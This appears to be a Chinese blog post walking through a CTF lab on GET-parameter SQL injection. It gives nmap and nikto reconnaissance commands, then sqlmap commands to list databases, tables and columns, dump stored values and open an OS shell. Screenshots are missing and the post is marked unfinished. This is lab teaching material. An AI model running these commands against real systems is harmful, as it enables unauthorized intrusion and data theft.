CTF—SQL注入(get)

CTF—WEB—SQL注入

SQL注入漏洞介绍

sql注入攻击指的是构建特殊的输入作为参数传入Web应用程序,而这些输入大都是sql语法里的一些组合,通过执行sql语句而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。

sql注入产生的原因,通常表现在:

  1. 不当的类型处理
  2. 不安全的数据库配置
  3. 不合理的查询集处理
  4. 不当的错误处理
  5. 转义字符处理不合适
  6. 多个提交处理不当

信息探测

扫描主机服务信息及服务版本

nmap -sV 靶机ip地址

快速扫描主机全部信息

nmap -T4 -A -v 靶场IP

探测敏感信息

nikto -host http://靶场IP:端口

深入挖掘

分析nmap、nikto的扫描结果,并对结果进行分析,挖掘可以利用的信息

使用浏览器打开http://ip:port/敏感页面,查看敏感信息,找到可以利用的位置

漏洞扫描

web漏洞扫描器——owasp-zap(kali)

漏洞利用

针对web进行漏洞扫描

对扫描的结果进行分析,如果有sql注入漏洞,可以直接利用。毕竟sql注入是高危漏洞,可以直接获取服务器权限。

使用sqlmap利用SQL注入漏洞

sqlmap -u url -dbs

sqlmap -u url -D “数据库名” -tables 查看对应数据库中的数据表

sqlmap -u url -D"数据库名" -T“表名” -columns 查看对应字段

sqlmap -u url -D"数据库名" -T“表名” -C"列名" -dump 查看对应的字段的值

也可以直接尝试sqlmap -u url -os - shell 直接获取shell

探测这个id是否具有sql漏洞:

在这里插入图片描述

查看数据库:
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

获取login和password:
在这里插入图片描述

未完结。。。。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值